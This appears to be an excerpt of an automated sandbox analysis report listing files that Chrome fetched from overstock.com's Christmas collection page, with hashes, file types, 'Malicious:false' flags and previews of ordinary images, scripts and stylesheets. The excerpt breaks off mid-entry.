                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 >...0....*P.P.>1..B.!!.... ....jl..}v..-....?....?Y...a?.V..S......k...,..K...j..NA...-..^..D.......r..\......./._.p.I.R..qd....XR..p...e...:..B..@.A..v+...%Ou.,..p.....*.U(..x.W.D.......?. ..J.,."z...I.....5?]sE....Rbg......a\b..:n.../Ox(.C.$.7.\.P .]...P;.v^......t.9. ..8.|.\j.M.J.5.&Y........s|.>.Wav.vf._*..d...y>...;.n"..T.A.tJ...j..u!.E.N...K.........4...*.I...$..6,:+.P.d..|.l.7...-....T..m....w.. .p._./+.wr.u.b.*P.(........7..$...)u.e...2....,ik..../:...../4..M.K~./C.....[...z..55.j>(....B.1r..l...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2688647
                                                                                                                                                                                    Entropy (8bit):5.31945902168662
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:t1eq+yNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3R:tj+3sUBYLFr1+Vz
                                                                                                                                                                                    MD5:48EAA3FC441E3F6365284147FBAC4304
                                                                                                                                                                                    SHA1:15332BCCA506A6AD0629324ACF3409F5AE537AC8
                                                                                                                                                                                    SHA-256:B876309D8E5B91848CD656E012BC643D41D996E8E443E98B2C4D1C655E9C16D1
                                                                                                                                                                                    SHA-512:8CF8CB5762DB489A4F6C60659F3C2778A795161A67D62B1026AC14FBF7CBA4C407BD1C642E412A078DAEDB8A4796557029618FF89416845AA5B7EA191D122FE9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/christmas
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/christmas").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):125
                                                                                                                                                                                    Entropy (8bit):4.204005083534792
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qYQgEaHqkYRedfFWx2hIYXE+w+seyeL+siJHn:qYQbkttWxgIeNLI
                                                                                                                                                                                    MD5:8D2F54111759C691A953D902208631AA
                                                                                                                                                                                    SHA1:9CAE89E749FB51B5B01EEC03464A34E2190AB471
                                                                                                                                                                                    SHA-256:377A17CE98EB244995F7D3D09B1194B15AA9F1F4DB5F5323B9F9187D3D06B39E
                                                                                                                                                                                    SHA-512:B25C388F446915BBAD1E9215375509D66D100C6585B67C9096D9BF0DA39C96A33182E7D30FD059372BBFBD21F9626B1BFFA0B585479DDE2D8DF2208CBFA542CA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:var s_gi = function() { . var s = {};. s.tl = s.trackLink = s.t = s.track = function() {};. return s; .};.var s = s_gi();.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65460)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):111802
                                                                                                                                                                                    Entropy (8bit):5.268240482340551
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:UZBnKRIUgcLRO26jyoxhbpQORNnNfM7dAg4uO9tboCsf:UvKRi+kbSW/Wd5Csf
                                                                                                                                                                                    MD5:5B9D8BAA112D5D1FE1575BC547A2D11C
                                                                                                                                                                                    SHA1:017C071245A55242CFABDBB70CE8D3D628B7A18F
                                                                                                                                                                                    SHA-256:2E5AA81E02F13EB7E2376331A641BC0BDF3DCFBC769872074CC3134C3FC4D0E3
                                                                                                                                                                                    SHA-512:0642614B00E1CBC28F3F669CE9473D4528F151644D1702001B5503BB9FC3615DB7C77721BD4C652CB3D67E2D6CC8AC4600443D8E2F1B8494334DEF96539193F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! For license information please see nr-spa-1.265.1.min.js.LICENSE.txt */."use strict";(self["webpackChunk:NRBA-1.265.1.PROD"]=self["webpackChunk:NRBA-1.265.1.PROD"]||[]).push([[478],{7699:(e,t,i)=>{i.d(t,{I:()=>r,N:()=>s});const s=64e3,r=1e6},9527:(e,t,i)=>{i.d(t,{n:()=>c});var s=i(9422),r=i(4777),n=i(4624),a=i(2838),o=i(2614);class c extends r.J{constructor(e,t,i){super(i),this.endpoint=e,this.opts=t||{},this.started=!1,this.timeoutHandle=null,this.aborted=!1,this.harvesting=!1,this.harvest=new n.M(this.sharedContext),(0,a.Q)(this.unload.bind(this)),this.sharedContext?.ee.on(o.tS.RESET,(()=>this.runHarvest({forceNoRetry:!0})))}unload(){this.aborted||(this.opts.onUnload&&this.opts.onUnload(),this.runHarvest({unload:!0}))}startTimer(e,t){this.interval=e,this.started=!0,this.scheduleHarvest(null!=t?t:this.interval)}stopTimer(e=!1){this.aborted=e,this.started=!1,this.timeoutHandle&&clearTimeout(this.timeoutHandle)}scheduleHarvest(e,t){this.timeoutHandle||(null==e&&(e=this.interval),thi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1132
                                                                                                                                                                                    Entropy (8bit):6.090947269810511
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:RTCIl/X2YlXWI2PUWGAE6fWk8A0n+LPWVOde+4q:QIl/XflyffJ8AlyVOv
                                                                                                                                                                                    MD5:0ED25598437C115258EE5DA670D81082
                                                                                                                                                                                    SHA1:0C69EE2B657507186D6441946BB06E2429789DB3
                                                                                                                                                                                    SHA-256:D9EB175440A5304EF4380A652F1F8DB14D0994085E5949B68EE954F0B890E37F
                                                                                                                                                                                    SHA-512:E71F863BBF6DE3A4570D60A2A9F759AFBFB3814B722114FAF8FDBE1DCAE2723745B13B543332DD3211F9E0CDCB344AEBE81E416F8088E2245F510DCCF8584DE2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_205b9da1-ecd0-48f6-b7d8-e939861d8d8d.jpg?v=1729322977&width=80
                                                                                                                                                                                    Preview:RIFFd...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!!.>e. .....F..>N.6..7.y.K*.q.=...@/^.o.Q.&.A.p9.....g.....f.&\......in)=......ok.a.:....U.^.S.t.7r7.,.z....^=......=..j...N.9E"5..}.=....i.......:].l..A'./6k.....7<...S.%..F.:....?.T.h.H.8.]$x ..4......VU|..b)...G.c..r..K.yq...@...:.fU....o...:t..=.:^j...p#.i.p.<..EB.D...1...G...A.|.V.9...{$...._..eW.gn.eW.1..f....a..0`..;,..Fu....9...,.;'....1N(....ANT~.:.W..`.....Z....l...5.S...2..UG.e!..!..f..1{..e..~..W.]~l...Fu.!......*0.......EXIF....Exif..II*...........................V...........^...(.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):65
                                                                                                                                                                                    Entropy (8bit):4.314128390879881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:2erWeKBRk35KLWAzRERxzfXHqq/H4Y3:29M3tRdfaqN
                                                                                                                                                                                    MD5:2DEA9F0F7E122E81EE9A3752902BDF19
                                                                                                                                                                                    SHA1:8747D6D270E001CEEA1174FF1D365D9CDEA52DCD
                                                                                                                                                                                    SHA-256:3D49CCE674B56473177888E83BA3303C68B74AF8F0032A94F4814F73F59132B9
                                                                                                                                                                                    SHA-512:723AC6A0C7A4139882197D5E4B59A48DB20A83C63E498C8C5FA1E057DBA75F33A1F927CC286D006BF107A04211998873FCC82656B719C40D49F633C466F0CD8F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:event: message.data: {"response":{"status_code":400,"body":""}}..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                    Entropy (8bit):4.686370289882632
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDutQTNjSJKDiTqPuBl+iIoQOv+XGADewJMBtDAEAB1+cHb:3RTNWY+TKQyoQO22cHJsDAdX
                                                                                                                                                                                    MD5:4B749470E4CA393269CC20C139C554E5
                                                                                                                                                                                    SHA1:F5926C6F51C7248C600BABCCB76F2A98D9B95DD6
                                                                                                                                                                                    SHA-256:F11035ED318096E8A499831BE4CCAC73F01D215425F950336B79510E59395669
                                                                                                                                                                                    SHA-512:3EA82611C7BD3A436E309542D03F1D9A1850D34BBCE9B8CB425179A68B2CFDFB2D86FC0B139ED33B057A74A448165DC9DED564214BB1FADA969C7CECC7649CD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_679)">.<path d="M6.78211 0.150521C6.86445 -0.0501734 7.13555 -0.0501738 7.21789 0.15052L9.02899 4.56477C9.06334 4.64848 9.13851 4.70581 9.22497 4.71423L13.7843 5.15808C13.9916 5.17826 14.0754 5.44889 13.919 5.59311L10.479 8.76512C10.4137 8.82527 10.385 8.91803 10.4041 9.00694L11.4109 13.6955C11.4566 13.9087 11.2373 14.0759 11.0583 13.9644L7.12112 11.5105C7.04646 11.464 6.95354 11.464 6.87887 11.5105L2.94171 13.9644C2.7627 14.0759 2.54338 13.9087 2.58915 13.6955L3.5959 9.00695C3.61499 8.91803 3.58628 8.82527 3.52104 8.76512L0.080984 5.59311C-0.0754184 5.44889 0.00835652 5.17826 0.215649 5.15808L4.77502 4.71423C4.86149 4.70581 4.93666 4.64848 4.97101 4.56477L6.78211 0.150521Z" fill="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_679">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1774
                                                                                                                                                                                    Entropy (8bit):6.962103516083773
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:VTCIl/X2YlXWI2PUycIsuFJXIbBdO43GYmDsTVGVPR+6qziAmczHcrit2pKEwTuG:cIl/XflocIR2L3GTDGG26qzycsiYpm
                                                                                                                                                                                    MD5:9536DAC9C96AE383D4ECBE7CC1C0E8A0
                                                                                                                                                                                    SHA1:C2BD59B9CB49B74B80DAEBC218407389D1929D18
                                                                                                                                                                                    SHA-256:38999AF936E443C35C81793C4315B36CBDD50D6344C256015540E82E0E610DF1
                                                                                                                                                                                    SHA-512:EDDDBCCC7C9B28DA11F4C77D875008259128886A7CC7AB6EA7EDE0A07400EF641005862E62A9906B9574E2287B5BD2B4110778519B4AD30DB053767574C0B49A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e867c6d3-4ef6-452d-b26c-abfbf9d08d44.jpg?v=1729325087&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 V...P....*P.P.>1..B.!!..$h ....D....g..T.-.7l.....zoD............... ...^.FB.U3.._J..?...;..f.B8..z.. TzN...l].....d....;|..sE./+4._...._z.?...<..gDA....h?D....H....h....!sT.....0...m.....6Q.y...R.._.>.v...K.....O@E..9Y}.ih..l0}@g.c..TSw..._...._.....r..&..q....E.....xbB......Q.z...CF.....Z.w^...W....I..........)m.tS...=.x.W<+.b.O.{.,../.|.y..+....m.oo..7..4.8*..4v.b........].......{.7.2.u.RF;.....A.f.......1.0........i.3gQY.<O....yy....?S.@....:!.n'..9q\...-...5H.9../..e.V./.&..e.X...".?...f..|9...Xs.r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3124
                                                                                                                                                                                    Entropy (8bit):7.352691170654654
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx8NLYFojtb04yfQCqv1fc1DY+lCAi7lpQflm8dDuweYF+BS:NBIl/XrxfejHwyv16s2+piuwh+BS
                                                                                                                                                                                    MD5:48174D9FC8FD792EBB833652D78CC6E1
                                                                                                                                                                                    SHA1:9689C37DF719DA1408A4C3B62D99E167005094BE
                                                                                                                                                                                    SHA-256:D1A6784295C1BF1CF08F1BC927B937EEE4AC7A2212865D66E97264A85D2045D3
                                                                                                                                                                                    SHA-512:2D22EEF31FAA234F9586D211493343C01AB09509A059021B115BED5EABC9E3B0B1B8137EBBDA4EF732159466FACCC339FA63A38558CA908168B2332C8903EBBB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................FmT6.LHG..D..nT...b.i.I..B.. Y.g..wy.....^.n>n...z3.6..Fs....l.i.diC......Nj.2.i..A4...IpU..'6.bXDN.7.m......m9..juO.....Rg...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1789
                                                                                                                                                                                    Entropy (8bit):5.177113566186224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uBG6L4YisqwTNjscsEdBZxCriQb6sL9isUx9ocpOBbS3DXQCzBbdByBQJD:uM6hTZs0BZA+U6wosU/1pOB+3DXHBZBd
                                                                                                                                                                                    MD5:33A4A0842739201FE8D314C6C48BF408
                                                                                                                                                                                    SHA1:1AB8D77E4D86FCA4882F24D9405A673E8EF0FD73
                                                                                                                                                                                    SHA-256:FF1082D7C1F055F71565D47208D92F4D8E4FEA909B02DDFC267D9C05F0E37475
                                                                                                                                                                                    SHA-512:EA2C07B574A7D01120924C956AA934B974143E83EC8C404CC9B5AF890BF268BB05B07F1A5D5505F337C21222D016BA279722658B9C1B3C4C29421DC50118749E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-cart-script.min.js?api_key=dc9d7751-8184-4d73-92ba-bc7abcb22008&sdk_url=sdk.iad-03.braze.com&shop=a37a28-2.myshopify.com&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:(function(t,c){const n=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(n){return}if(typeof c!=="function")return;function i(){var t=null;if(window.braze!==undefined){t=window.braze}else if(window.appboy!==undefined){t=window.appboy}return t}function a(){const t=new URL([...document.getElementsByTagName("script")].map(t=>t.src).find(t=>t.includes("braze-cart-script")));const n=new URLSearchParams(t.search);return Object.fromEntries(n.entries())}function s(t,n){const e=decodeURIComponent(t);const r=e.indexOf(n);if(r!==-1){return e.substring(0,r)}return t}function e(t){var n=t+"=";var e=document.cookie.split(";");for(var r=0;r<e.length;r++){var o=e[r];while(o.charAt(0)==" ")o=o.substring(1,o.length);if(o.indexOf(n)==0)return o.substring(n.length,o.length)}return null}function r(e){const r=s(e,"?key=");const o=localStorage.getItem("cart_token");i().getDeviceId(function(t){if(e!=null&&r!=o){localStorage.setItem("cart_token",r);const n=a();c("https://"+n["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1032x1033, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):100739
                                                                                                                                                                                    Entropy (8bit):7.938837158709188
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Orx+M0zfxjSARzqokD1GpiT4uhP/Df9oCn6aH2lfdP/HH7kZYOxM5jFGTq4:y+MKRzUBL8uB9XdHwfdnoZY8KM
                                                                                                                                                                                    MD5:CE1A1011975F5023CB5493759ADD4D0E
                                                                                                                                                                                    SHA1:B22594A55C8CAA7281F540F019E95F0C984D5CB3
                                                                                                                                                                                    SHA-256:479FA93C7294F3BB363EE1E56785DA0FFA2DCFED3004BAAA3FB54A331F656615
                                                                                                                                                                                    SHA-512:A78100684ED471C407297F8AFD5BC0896D132AB5F56EAEDC20A468D0D36A9FC2D38A8442CBE5F748E005FFC9C29B002F9335195D9880C10704A5A885C0A5956B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0...................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.............."..........3.........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (5864)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):630828
                                                                                                                                                                                    Entropy (8bit):4.3670817970855405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:klkNKGpYHs0BMHxl679L1EM5oFaCWdf8invU6I/EQn:klk07379L1T5oFeU6I/L
                                                                                                                                                                                    MD5:44920488C360E599ACE572187816D2CB
                                                                                                                                                                                    SHA1:56926B9A9058E84065CCFE2EA727F16AFB1292FE
                                                                                                                                                                                    SHA-256:90AE4683258FA87565A0D44000C3877A15B9F3118C300EB7307F6B06AACC9E83
                                                                                                                                                                                    SHA-512:3EC6B22B1F6047932055F02D22062B37C01031BADC2E9BB7C1FB37D4AEE2E500D5BA24773C544E91ECF695C9CA1E94DEACBE179FEF8C88A5ECFD3E2336200AFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/freeGiftLogicv1.js
                                                                                                                                                                                    Preview:..let DEFAULT_addToCartBtnSelectorsApp7Ext = 'input[name="add"], button[name="add"], form[action*="/cart/add"] .gfg__add-to-cart,form[action*="/cart/add"] button[type="submit"], form[action*="/cart/add"] input[type="submit"], .product-form__buttons, .productView-group, .prd-Benefits, .product__submit__buttons, .t4s-product-form__buttons, .product-form__buy-buttons, .product__description, .v-stack.gap-4, .quantity-selector, .groups-btn';.let DEFAULT_checkoutBtnSelectorsApp7Ext = 'button[name="checkout"], input[name="checkout"], form[action*="/cart"] a[href="/checkout"], a[href="/checkout"], form[action="/cart"] input[type="submit"][name="checkout"], form[action="/cart"] button[type="submit"][name="checkout"], .previewCartInfo, .cart__ctas, .cart__items, .buy-buttons--compact, .drawer__footer, .ajax-cart__buttons, .taxes-discounts, .button-container, cart-drawer .line-item__content-wrapper, .mini-cart__actions, .cart__checkout-wrapper, .cart__footer-message, .js-contents, .cart--footer';
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 516x516, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):10418
                                                                                                                                                                                    Entropy (8bit):7.81789881791308
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:2M+nLUtMLKHGig7HvV6kUxQ9wpswXUSUYM4h8Jpue9baOEoGKyRI5IOw7P:mnLUqm+PVNUxrpo1YM8uMeFEmYI5xw7P
                                                                                                                                                                                    MD5:A8E432238F3000499D87FDADAC25FF6B
                                                                                                                                                                                    SHA1:8CF8BCAC7EE4E4A18E2C510C83F6A2FE593E18F6
                                                                                                                                                                                    SHA-256:A1A5A0D6E867FB48475D2D4B380B0D0734CA9980745E48113B95478552D4F67B
                                                                                                                                                                                    SHA-512:B2518FE6330A339516DA09510C914ECD0837FA809C0713D5A6EE7E03BCD9C6F264DD04E61642B628333D92C77DB4A3E8437F34501A4E831D26F1A828D9552732
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C............."..........1............................................................................................................................................"...G.a>5|.....Q..Q.........S.%.W.9.gK..t^y.'V..[+5..i4......{.}.tZb..g.!...:B.8...............f..m5.d..(`u..Kq]z@..i]c....\....6...;.l..J..........].]..$.E/;.s...|...,...........$.........t|........ ."{..Y.H.c..4.D.Sa.pl!V7..z...o...6C....z.x.._..b.........S\..`{.p....{..6..%~B4.3.......F.e....X....tA......}.m....E.?yFl....@..........dc..d.s..6z..a.....q......O..D....+..$......}..z...&l)...k..{Z.../.............d=.{..#..M....B.pi...:.(.#.,..w....q.G!..<..L{z7J.$..}y..Y@.............R].s...zc...k..[|{!.].U.z....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (608)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):823
                                                                                                                                                                                    Entropy (8bit):5.079251934712805
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
                                                                                                                                                                                    MD5:8972AE5004BC634FFA6641BE3960E78A
                                                                                                                                                                                    SHA1:235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
                                                                                                                                                                                    SHA-256:7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
                                                                                                                                                                                    SHA-512:F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                    Entropy (8bit):4.687424504579636
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB+KxcOfl6q2JdZ2k64dKxAQVQsLVn:YWtIkW/fAnB+wcOF2JdsMdKxPLVn
                                                                                                                                                                                    MD5:9D3ABE0863D136671C6F04E3197B1B34
                                                                                                                                                                                    SHA1:A5A33D5FAE5670F115525A6C19BEB7F1567A2E9E
                                                                                                                                                                                    SHA-256:24845EC4070A50C3BD7414381B7632B01B90D76D1A302E5EF2DC7D1C61D0D124
                                                                                                                                                                                    SHA-512:7E4B3CA5B6CE8922CC9A61DC1078219AFBAD0109EF80EA920ACE5E5AF97FD78B989D0F1056E12B7E43B6CAB08903A929DD63ED39888A33EBD0DB8CC4CA46DC54
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"35271394","rollup":{"average_rating":4.17,"rating_count":6,"review_count":6,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (46330), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):46333
                                                                                                                                                                                    Entropy (8bit):5.57453197308718
                                                                                                                                                                                    Encrypted:false
